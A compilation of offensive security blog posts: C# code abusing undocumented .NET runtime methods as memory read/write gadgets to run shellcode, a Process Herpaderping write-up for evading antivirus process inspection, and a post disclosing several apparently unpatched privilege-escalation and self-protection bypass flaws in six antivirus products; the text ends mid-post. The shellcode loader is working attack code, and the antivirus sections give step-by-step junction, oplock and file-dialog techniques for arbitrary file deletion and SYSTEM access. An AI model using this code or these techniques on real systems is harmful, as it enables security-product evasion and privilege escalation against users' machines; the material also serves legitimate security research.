[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
public const int mdcHasNativeCodeSlot = 0x0020;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawExecNativeSlot.cs hosted with ❤ by GitHub

And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:

So, what else can we find in the .NET runtime, are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code which transfer execution into the CLR. Inside the CLR they are referred to as an “FCall” and “QCall” respectively. The reasons that these calls exist are varied, but essentially when the .NET framework can’t do something from within managed code, a FCall or QCall is used to request native code perform the function before returning back to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetFunctionPointerForDelegateInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition between .NET code disassembly into reviewing the source for the CLR certainly would slow down static analysis… hopefully increasing that WTF!! factor during analysis. Let’s start by hunting for a set of memory read and write gadgets which as we now know from above, will lead to code execution.

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK so this looks good, here we have an IntPtr being passed from managed to unmanaged code, without any kind of validation that the pointer we are passing is in fact a NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A review shows us that we can use this to return arbitrary memory of IntPtr.Size bytes in length. How can we do this? Well let’s return to .NET and try the following code:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ReadGadget
{
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType(«System.StubHelpers.StubHelpers»);
var GetNDirectTarget = stubHelper.GetMethod(«GetNDirectTarget», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Spray away
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
}
}

view rawReadGadget.cs hosted with ❤ by GitHub

And if we run this:

Awesome, so we have our first example of a gadget which can be useful to interact with unmanaged memory. Next, we should think about how to write memory. Again if we review potential FCalls and QCalls it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngRefCustomMarshalaer, we find that the m_pCMHelper is the only member variable present in the class:

So, this one is easy, we can write 8 bytes to any memory location as we control both pThis and pCMHelper. The code to do this looks something like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace NautilusProject
{
public class WriteGadget
{
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType(«System.StubHelpers.MngdRefCustomMarshaler»);
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod(«CreateMarshaler», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
}
}

view rawWriteGadget.cs hosted with ❤ by GitHub

Let’s have some fun and use this gadget to modify the length of a System.String object to show the control we have to modify arbitrary memory bytes:

OK, so now we have our 2 (of MANY possible) gadgets, what would it looks like if we transplanted this into our code execution example? Well, we end up with something pretty weird:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Linq;
namespace NautilusProject
{
internal class CombinedExec
{
public static IntPtr AllocMemory(int length)
{
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
return mem;
}
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType(«System.StubHelpers.MngdRefCustomMarshaler»);
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod(«CreateMarshaler», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType(«System.StubHelpers.StubHelpers»);
var GetNDirectTarget = stubHelper.GetMethod(«GetNDirectTarget», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
public static void CopyMemory(byte[] source, IntPtr dest)
{
// Pad to IntPtr length
if ((source.Length % IntPtr.Size) != 0)
{
source = source.Concat<byte>(new byte[source.Length % IntPtr.Size]).ToArray();
}
GCHandle pinnedArray = GCHandle.Alloc(source, GCHandleType.Pinned);
IntPtr sourcePtr = pinnedArray.AddrOfPinnedObject();
for (int i = 0; i < source.Length; i += IntPtr.Size)
{
WriteMemory(dest + i, ReadMemory(sourcePtr + i));
}
}
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var ecBase = ReadMemory(t.TypeHandle.Value + 0x28);
var mdcBase = ReadMemory(ecBase + 0x20);
IntPtr stub = ReadMemory(mdcBase + 0x18 + 8);
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
CopyMemory(shellcode, mem);
CopyMemory(jmpCode, stub);
WriteMemory(stub + 2, mem);
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
public static class Internals
{
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawDogFoodExec.cs hosted with ❤ by GitHub

And of course, if we execute this, we end up with our desired result of unmanaged code execution:

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!

Process Herpaderping

Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.

Original text by jxy-s

Process Herpaderping is a method of obscuring the intentions of a process by modifying the content on disk after the image has been mapped. This results in curious behavior by security products and the OS itself.

https://github.com/jxy-s/herpaderping

Summary

Generally, a security product takes action on process creation by registering a callback in the Windows Kernel (PsSetCreateProcessNotifyRoutineEx). At this point, a security product may inspect the file that was used to map the executable and determine if this process should be allowed to execute. This kernel callback is invoked when the initial thread is inserted, not when the process object is created.

Because of this, an actor can create and map a process, modify the content of the file, then create the initial thread. A product that does inspection at the creation callback would see the modified content. Additionally, some products use an on-write scanning approach which consists of monitoring for file writes. A familiar optimization here is recording the file has been written to and defer the actual inspection until IRP_MJ_CLEANUP occurs (e.g. the file handle is closed). Thus, an actor using a write -> map -> modify -> execute -> close workflow will subvert on-write scanning that solely relies on inspection at IRP_MJ_CLEANUP.

To abuse this convention, we first write a binary to a target file on disk. Then, we map an image of the target file and provide it to the OS to use for process creation. The OS kindly maps the original binary for us. Using the existing file handle, and before creating the initial thread, we modify the target file content to obscure or fake the file backing the image. Some time later, we create the initial thread to begin execution of the original binary. Finally, we will close the target file handle. Let’s walk through this step-by-step:

  1. Write target binary to disk, keeping the handle open. This is what will execute in memory.
  2. Map the file as an image section (NtCreateSectionSEC_IMAGE).
  3. Create the process object using the section handle (NtCreateProcessEx).
  4. Using the same target file handle, obscure the file on disk.
  5. Create the initial thread in the process (NtCreateThreadEx).
    • At this point the process creation callback in the kernel will fire. The contents on disk do not match what was mapped. Inspection of the file at this point will result in incorrect attribution.
  6. Close the handle. IRP_MJ_CLEANUP will occur here.
    • Since we’ve hidden the contents of what is executing, inspection at this point will result in incorrect attribution.
@startuml
hide empty description

[*] --> CreateFile
CreateFile --> FileHandle
FileHandle --> Write
FileHandle --> NtCreateSection
Write -[hidden]-> NtCreateSection
NtCreateSection --> SectionHandle
SectionHandle --> NtCreateProcessEx
FileHandle --> Modify
NtCreateProcessEx -[hidden]-> Modify
NtCreateProcessEx --> NtCreateThreadEx
Modify -[hidden]-> NtCreateThreadEx
NtCreateThreadEx --> [*]
FileHandle --> CloseFile
NtCreateThreadEx -[hidden]-> CloseFile
NtCreateThreadEx --> PspCallProcessNotifyRoutines
PspCallProcessNotifyRoutines -[hidden]-> [*]
CloseFile --> IRP_MJ_CLEANUP
IRP_MJ_CLEANUP -[hidden]-> [*]
PspCallProcessNotifyRoutines --> Inspect
PspCallProcessNotifyRoutines -[hidden]-> CloseFile 
IRP_MJ_CLEANUP --> Inspect
Inspect -[hidden]-> [*]

CreateFile : Create target file, keep handle open.
Write : Write source payload into target file.
Modify : Obscure the file on disk.
NtCreateSection : Create section using file handle.
NtCreateProcessEx : Image section for process is mapped and cached in file object.
NtCreateThreadEx : The cached section is used.
NtCreateThreadEx : Process notify routines fire in kernel.
Inspect : The contents on disk do not match what was executed. 
Inspect : Inspection of the file at this point will result in incorrect attribution.
@enduml

Behavior

You’ll see in the demo below, CMD.exe is used as the execution target. The first run overwrites the bytes on disk with a pattern. The second run overwrites CMD.exe with ProcessHacker.exe. The Herpaderping tool fixes up the binary to look as close to ProcessHacker.exe as possible, even retaining the original signature. Note the multiple executions of the same binary and how the process looks to the user compared to what is in the file on disk.

Diving Deeper

We’ve observed the behavior and some of this may be surprising. Let’s try to explain this behavior.

Technical Deep Dive

Background and Motivation

When designing products for securing Windows platforms, many engineers in this field (myself included) have fallen on preconceived notions with respect to how the OS will handle data. In this scenario, some might expect the file on disk to remain «locked» when the process is created. You can’t delete the file. You can’t write to it. But you can rename it. Seen here, under the right conditions, you can in fact write to it. Remain vigilant on your assumptions, always question them, and do your research.

The motivation for this research came about when discovering how to do analysis when a file is written. With prior background researching process Hollowing and Doppelganging, I had theorized this might be possible. The goal is to provide better security. You cannot create a better lock without first understanding how to break the old one.

Similar Techniques

Herpaderping is similar to Hollowing and Doppelganging however there are some key differences:

Process Hollowing

Process Hollowing involves modifying the mapped section before execution begins, which abstractly this looks like: map -> modify section -> execute. This workflow results in the intended execution flow of the Hollowed process diverging into unintended code. Doppelganging might be considered a form of Hollowing. However, Hollowing, in my opinion, is closer to injection in that Hollowing usually involves an explicit write to the already mapped code. This differs from Herpaderping where there are no modified sections.

Process Doppelganging

Process Doppelganging is closer to Herpaderping. Doppelganging abuses transacted file operations and generally involves these steps: transact -> write -> map -> rollback -> execute. In this workflow, the OS will create the image section and account for transactions, so the cached image section ends up being what you wrote to the transaction. The OS has patched this technique. Well, they patched the crash it caused. Maybe they consider this a «legal» use of a transaction. Thankfully, Windows Defender does catch the Doppelganging technique. Doppelganging differs from Herpaderping in that Herpaderping does not rely on transacted file operations. And Defender doesn’t catch Herpaderping.

Comparison

For reference, the generalized techniques:

TypeTechnique
Hollowingmap -> modify section -> execute
Doppelgangingtransact -> write -> map -> rollback -> execute
Herpaderpingwrite -> map -> modify -> execute -> close

We can see the differences laid out here. While Herpaderping is arguably noisier than Doppelganging, in that the malicious bits do hit the disk, we’ve seen that security products are still incapable of detecting Herpaderping.

Possible Solution

There is not a clear fix here. It seems reasonable that preventing an image section from being mapped/cached when there is write access to the file should close the hole. However, that may or may not be a practical solution.

Another option might be to flush the changes to the file through to the cached image section if it hasn’t yet been mapped into a process. However, since the map into the new process occurs at NtCreateProcess that is probably not a viable solution.

From a detection standpoint, there is not a great way to identify the actual bits that got mapped, inspection at IRP_MJ_CLEANUP or a callback registered at PsSetCreateProcessNotifyRoutineEx results in incorrect attribution since the bits on disk have been changed, you would have to rebuild the file from the section that got created. It’s worth pointing out here there is a new callback in Windows 10 you may register for PsSetCreateProcessNotifyRoutineEx2 however this suffers from the same problem as the previous callback, it’s called out when the initial thread is executed, not when the process object is created. Microsoft did add PsSetCreateThreadNotifyRoutineEx which is called out when the initial thread is inserted if registered with PsCreateThreadNotifyNonSystem, opposed to when it is about to begin execution (as the old callback did). Extending PSCREATEPROCESSNOTIFYTYPE to be called out when the process object is created won’t help either, we’ve seen in the Diving Deeper section that the image section object is cached on the NtCreateSection call not NtCreateProcess.

We can’t easily identify what got executed. We’re left with trying to detect the exploitive behavior by the actor, I’ll leave discovery of the behavior indicators as an exercise for the reader.

Known Affected Platforms

Below is a list of products and Windows OSes that have been tested as of (8/31/2020). Tests were carried out with a known malicious binary.

Operating SystemVersionVulnerable
Windows 7 Enterprise x866.1.7601Yes
Windows 10 Pro x6410.0.18363.900Yes
Windows 10 Pro Insider Preview x6410.0.20170.1000Yes
Windows 10 Pro Insider Preview x6410.0.20201.1000Yes
Security ProductVersionVulnerable
Windows Defender AntiMalware Client4.18.2006.10Yes
Windows Defender Engine1.1.17200.2Yes
Windows Defender Antivirus1.319.1127.0Yes
Windows Defender Antispyware1.319.1127.0Yes
Windows Defender AntiMalware Client4.18.2007.6Yes
Windows Defender Engine1.1.17300.2Yes
Windows Defender Antivirus1.319.1676.0Yes
Windows Defender Antispyware1.319.1676.0Yes
Windows Defender AntiMalware Client4.18.2007.8Yes
Windows Defender Engine1.1.17400.5Yes
Windows Defender Antivirus1.323.267.0Yes
Windows Defender Antispyware1.323.267.0Yes

Responsible Disclosure

This vulnerability was disclosed to the Microsoft Security Response Center (MSRC) on 7/17/2020 and a case was opened by MSRC on 7/22/2020. MSRC concluded their investigation on 8/25/2020 and determined the findings are valid but do not meet their bar for immediate servicing. At this time their case is closed, without resolution, and is marked for future review, with no timeline.

We disagree on the severity of this bug; this was communicated to MSRC on 8/27/2020.

  1. There are similar vulnerabilities in this class (Hollowing and Doppelganging).
  2. The vulnerability is shown to defeat security features inherent to the OS (Windows Defender).
  3. The vulnerability allows an actor to gain execution of arbitrary code.
  4. The user is not notified of the execution of unintended code.
  5. The process information presented to the user does not accurately reflect what is executing.
  6. Facilities to accurately identify the process are not intuitive or incorrect, even from the kernel.

Source

This repo contains a tool for exercising the Herpaderping method of process obfuscation. Usage is as follows:

Process Herpaderping Tool - Copyright (c) Johnny Shaw
ProcessHerpaderping.exe SourceFile TargetFile [ReplacedWith] [Options...]
Usage:
  SourceFile               Source file to execute.
  TargetFile               Target file to execute the source from.
  ReplacedWith             File to replace the target with. Optional,
                           default overwrites the binary with a pattern.
  -h,--help                Prints tool usage.
  -d,--do-not-wait         Does not wait for spawned process to exit,
                           default waits.
  -l,--logging-mask number Specifies the logging mask, defaults to full
                           logging.
                               0x1   Successes
                               0x2   Informational
                               0x4   Warnings
                               0x8   Errors
                               0x10  Contextual
  -q,--quiet               Runs quietly, overrides logging mask, no title.
  -r,--random-obfuscation  Uses random bytes rather than a pattern for
                           file obfuscation.
  -e,--exclusive           Target file is created with exclusive access and
                           the handle is held open as long as possible.
                           Without this option the handle has full share
                           access and is closed as soon as possible.
  -u,--do-not-flush-file   Does not flush file after overwrite.
  -c,--close-file-early    Closes file before thread creation (before the
                           process notify callback fires in the kernel).
                           Not valid with "--exclusive" option.
  -k,--kill                Terminates the spawned process regardless of
                           success or failure, this is useful in some
                           automation environments. Forces "--do-not-wait
                           option.

Cloning and Building

The repo uses submodules, after cloning be sure to init and update the submodules. Projects files are targeted to Visual Studio 2019.

git clone https://github.com/jxy-s/herpaderping.git
cd .\herpaderping\
git submodule update --init --recursive
MSBuild .\herpaderping.sln

Credits

The following are used without modification. Credits to their authors.

  • Windows Implementation Libraries (WIL)
    A header-only C++ library created to make life easier for developers on Windows through readable type-safe C++ interfaces for common Windows coding patterns.
  • Process Hacker Native API Headers
    Collection of Native API header files. Gathered from Microsoft header files and symbol files, as well as a lot of reverse engineering and guessing.

Oh, so you have an antivirus… name every bug

Oh, so you have an antivirus… name every bug

Original text by halove23

Oh, so you have an antivirus… name every bug

After my previous disclosure with Windows defender and Windows Setup, this is the next one

First of all, why ? it’s because I can, and because I need a job.

In this blog I will be disclosing about 8 0-day vulnerability and all of them are still unknow to the vendors, don’t expect those bugs to be working for more than a week or two cause probably they will release an emergency security patches to fix those bugs.

    Avast antivirus

a.   Sandbox Escape

So avast antivirus (any paid version) have a feature called Avast sandbox, this feature allow you to test suspicious file in sandbox. But this sandbox is completely different from any sandbox I know, let’s say windows sandboxed apps are running in a special container and also by applying some mitigation to their tokens (such as: lowering token integrity, applying the create process mitigation…) and other sandboxes actually run a suspicious file in a virtual machine instead so the file will stay completely isolated. But Avast sandbox is something completely different, the sandboxed app run in the OS and with few security mitigation to the sandboxed app token, such as removing some privileges like SeDebugPrivilege, SeShutdownPrivilege… while the token integrity stay the same, while this isn’t enough to make a sandbox. Avast sandbox actually create a virtualized file stream and registry hive almostly identical to the real one, while it also force the sandboxed app to use the virtualized stream by hooking every single WINAPI call ! This sounds cool but also sound impossible, any incomplete hooking could result in sandbox escape.

Btw, the virtualized file stream is located in “C:\avast! sandbox”

While the virtualized registry hive exist in “H****\__avast! Sandbox” and it look like there’s also a virtualized object manager in “\snx-av\”

So normally to make any escape I should read any available write-ups related to avast sandbox escape, and after some research it look like I found something: CVE-2016-4025 and another bug by google project zero.

Nettitude Labs covered a crafted DeviceIoControll call in order to escape from the virtualization, they noticed after using the “Save As” feature in notepad the actual saved file is outside the sandbox (in the real filesystem) and it look like it’s my way to get out

I selected their way by clicking on “Save As” and it don’t seems to be working because the patch has disabled the feature but instead of clicking on “Save As” I clicked in “Print”

By doing that it look like we got another pop-up so normally I clicked print with the default printer “Microsoft XPS Document Writer”

And yup we will have a “Save As” window after clicking on Print

So clicked on Save, I really didn’t expected anything to happen but guess what

The file was spawned outside the virtualized file stream. That’s clearly a sandbox escape.

How ? it seems look like an external process written the file while impersonating notepad’s access token. And luckily since CVE-2020-1337 I was focused on learning the Printer API by reading every single documentation provided by Microsoft, while in other side. James Forshaw published something related to a windows sandbox escape by using the Printer API here.

So I assume we can easily escape from the sandbox if we managed to call the Printer API correctly, so we will begin with OpenPrinter function

And of course we will specify in pPrinterName the default printer that exist on a standard windows installation “Microsoft XPS Document Writer”

Next we will go for StartDocPrinter function which allow us to prepare a document for printing and the third argument looks kinda important

So we will take a look in DOC_INFO_1 struct and there’s some good news

It look like the second member will allow us to specify the actual file name so yeah it’s probably our way out of Avast sandbox.

So what now, we can probably see the file outside the sandbox, but what about writing things to the file. After further research I found another function which work like WriteFile it’s WritePrinter

Then the final result will look like this

Note: The bug was reported to the vendor but they didn’t replied as usual

a.   Privilege Escalation

It was a bit hard to find a privilege escalation but after taking some time, here you go Avast, there’s a feature in Avast called “REPAIR APP” after clicking on it, it look like a new child process is being created by Avast Antivirus Engine called “Instup.exe”

Probably there’s something worthy to look there, after attempting to repair the app. In this case we will be using a tool called Process Monitor

And as usual we got something that worth our attention, the instup process look for some non existing directories C:\stage0 and c:\stage1

So what if they exist ?

I created the c:\stage0 directory with a subfile inside it and I took a look on how the instup.exe behave against it and I observed an unexpected behaviour, instead of just deleting or ignoring the file it actually create a hardlink to the file

we can exploit the issue but the issue is that the hardlink have a random name and guessing it at the time of the hardlink we can redirect the creation to an arbitrary location but unluckily the hardlink random name is incredible hard to guess, if we attempted who know how much time it will take so I prefer to not look there instead I started looking somewhere else

In the end of the process of hardlink creation, you can see that both of them has been marked for deletion, probably we can abuse the issue to achieve an arbitrary file deletion bug.

I’ve created an exploit for the issue, the exploit will create a file inside c:\stage0 and will continuously look for the hardlink. When the hardlink is created the poc OpLock it until instup attempt to delete it, then the poc will move the file away and set c:\stage0 into junction to “\RPC CONTROL\” which there we will create a symbolic link to redirect the file deletion to an arbitrary file

Note: This bug wasn’t reported to the vendor.

PoC can be found here

McAfee Total Security

a.   Privilege Escalation

I already found bugs on this AV before and got acknowledged by vendor

For CVE-2020-7279 and CVE-2020-7282

CVE-2020-7282 was for an arbitrary file deletion issue in McAfee total protection and CVE-2020-7279 was for self-defence bypass.

The McAfee total security was vulnerable to an arbitrary file deletion, by creating a junction from C:\ProgramData\McAfee\Update to an arbitrary location result in arbitrary file deletion, the security patch was done by enforcing how McAfee total security updater handle reparse point.

But the most important is C:\ProgramData\McAfee\Update is actually protected by the self defence driver, so even an administrator couldn’t create files in this directory. The bypass was done by open the directory for GENERIC_WRITE access and then creating a mount point to the target directory so as soon the updater start it will delete the target directory subcontent.

But now a lot has changed, the directory now has subcontent (previously it was empty by default), 

After doing some analysis on how they fixed the self defence bug. Instead of preventing the directory opening (as it was expected) with GENERIC_WRITE they blocked the following control codes FSCTL_SET_REPARSE_POINT and FSCTL_SET_REPARSE_POINT_EX from being called on a protected filesystem component, I expected FSCTL_SET_REPARSE_POINT_EX but no they did a smart move in this case, so if we didn’t bypass the self defence we don’t have any actual impact on the component.

So this is it, this is as far as I can go… or no ?

a.   Novel way to bypass the self defence

This method work for all antiviruses which the filesystem filter.

So how does the kernel filter work ?

The filesystem filter restrict the access to the antivirus owned objects, by intercepting the user mode file I/O request, if the request coming from an antivirus component it will be granted, if not it will return access denied.

You can read more about that here, I already wrote some of them but for some private usage so for the moment I can’t disclose them, but there’s a bunch of examples you can find by example: here

So as far as I know there’s 2 way to bypass the filter

1.     Do a special call so it will be conflicted by what the driver see

2.     Request access from a protected component

So the special way was patched in CVE-2020-7279, the option that remain is the second one. How can we do that ?

The majority of the AV’s GUI support file dialog to select something let’s take by example McAfee file shredder which open a file dialog in order to let you choose to pick something

While the file dialog is used to pick files it be weaponized against the AV, to better understand the we need to make an example code, so I had to look for the API provided by Microsoft to do that. Generically apps use either GetOpenFileNameW or IFileDialog interface and since GetOpenFileNameW seems to be a bit deprecated we will focusing in IFileDialog Interface.

So I created a sample code (it look horrible but still doing the job)

After running the code

It look like that the job is being done from the process not from an external process (such as explorer), so technically anything we do is considered to be done as the process.

Hold on, if the things are done by the process. Doesn’t that mean that we can create a folder in a protected location ? Yes we can

c.   Weaponizing the self-protection bypass

The CVE-2020-7282 patch was a simple check against reparse points, before managing to delete any directory.

There’s a simple check to be done, if FSCTL_GET_REPARSE_POINT control on a directory return anything except STATUS_NOT_A_REPARSE_POINT the target will removed else the updater will delete the subcontent as

“NT AUTHORITY\SYSTEM”

Chaining it together, I’ve an exploit which demonstrate the bug, first a directory in C:\updmgr will be created and then you should manually move it to C:\ProgramData\McAfee\Update an opportunistic lock will trigger the poc to create a reparse point to the target as soon as the AV GUI attempt to move the folder, the poc will set it to reparse point and will lock the moved directory so it will prevent the reparse point deletion.

PoC can be found here

Avira Antivirus

 I’m gonna do the tests on Avira Prime, not gonna lie Avira has the easiest way to download their antivirus. Not like other vendors they crack your head before they give the trial, I really feel bad for disclosing this bug

Anyway it look like there’s a feature come with Avira Prime called Avira System Speedup Pro, I can’t still explain why this behaviour exist in Avira System Speedup feature but yeah it exist.

When starting the Avira System Speedup Pro GUI there’s an initialization done by the service “Avira.SystemSpeedup.Service.exe” which is written in C# which make it easier to reverse the service but I reversed the service and things just doesn’t make any sense so I guess it’s better to show process monitor output to understand the issue.

 When opening the GUI I assume that there’s an RPC communication between the GUI and the service to make the required initialization in order to serve the user needs. While the service begin the initialization process it will create and remove a directory in C:\Windows\Temp\Avira.SystemSpeedup.Service.madExcept

without even checking for reparse point. It’s extremely easy to abuse the issue.

This time instead of writing a c++ PoC I’ll be writing a simpler one as a batch script. The PoC in this case doesn’t need any user interaction, and will delete the targeted directory subcontent.

PoC can be found here

1    Trend Micro Maximum security

 One of the best AV’s I’ve ever seen, but unluckily this disclosure include this antivirus to the black list.

I already discovered an issue in trend micro and it was patched in CVE-2020-25775, I literally just found a high severity issue on trend micro. But I was contracted for so I can’t disclose it here.

Moving out, as other AV’s there’s a PC Health Checkup feature, it probably worth our attention.

While browsing trough the component, I noticed that there’s a feature “Clean Privacy Data” feature.

I clicked on MS Edge and cleaned, the output from process monitor was:

And as you see Trend Micro Platinum Host Service is deleting a directory in a user write-able location without proper check against reparse point while running as “NT AUTHORITY\SYSTEM” which is easily abuse-able by a user to delete arbitrary files.

There’s nothing to say more, I created a proof of concept as a batch script after running it expect the target directory subcontent to be deleted.

PoC can be found here

MalwareBytes

 Yup, another good AV, Already engaged with the antivirus and as usual I got a bug. 5 months has passed since I reported the bug, they still didn’t patched the issue and since they paid the bounty, I can’t disclose the bug but as usual PAPA has candies for you !

I will using the same technique explained above to bypass the self protection.

While checking for updates, the antivirus look for a non existing directory

Hmmmm, let’s take a look

The pic shown above, show us that Malwarebytes antivirus engine is deleting every subcontent of C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate\test.txt.txt and since there’s no impersonation of the user and literally no proper check against reparse point we can probably abuse that, by creating a directory there and creating a reparse point inside  C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate we can redirect the file deletion to an arbitrary location.

The PoC can be found here

1    Kaspersky

The AV which I engaged with the most, about 11 bugs were reported and 3 of them were fixed.

For the moment I will be talking about a bug which I already disclosed here, this PoC will spawn a SYSTEM shell as soon as it succeed, the bug seems to be still existing on Kaspersky Total Security with December 2020 latest security patches, the only issue you will have is the AV will detect the exploit as a malware, you must do some modification to prevent your exploit from being deleting. Let’s I can confirm that the issue still exist.

One more thing

Another issue I discovered in all Kaspersky’s antiviruses which allow arbitrary file overwrite without user interaction. I’ve already reported the bug to Kaspersky but they didn’t gave me a bug bounty

They said that the issue isn’t eligible for bug bounty because the reproduction of the issue is unstable, ain’t gonna lie I gave them a horrible proof of concept but still do the job so I guess it should be rewarded and since they wrote that they gave bounties. I won’t give bugs for free like a foo.

So let’s dive inside the bug, when any user start Mozilla Firefox, Kaspersky write a special in %Firefox_Dir%\defaults\pref while not impersonating the user or not even doing proper links check, if abused correctly it can be used against the AV to trigger arbitrary file overwrite on-demand without user interaction.

A proof of concept is attached implement the issue, I’ve rewritten a new one which will trigger your needs on demand thanks me later.

PoC can be found here

Windows

 I was about to disclose bugs in Eset and Bitdefender but I don’t have time to write more, so here’s the last one.

First, if you’re not familiar with windows installer CVE-2020-16902, it’s literally the 6th time I am bypassing the security patch and they still don’t hire security researchers. I will be using the same package as CVE-2020-16902

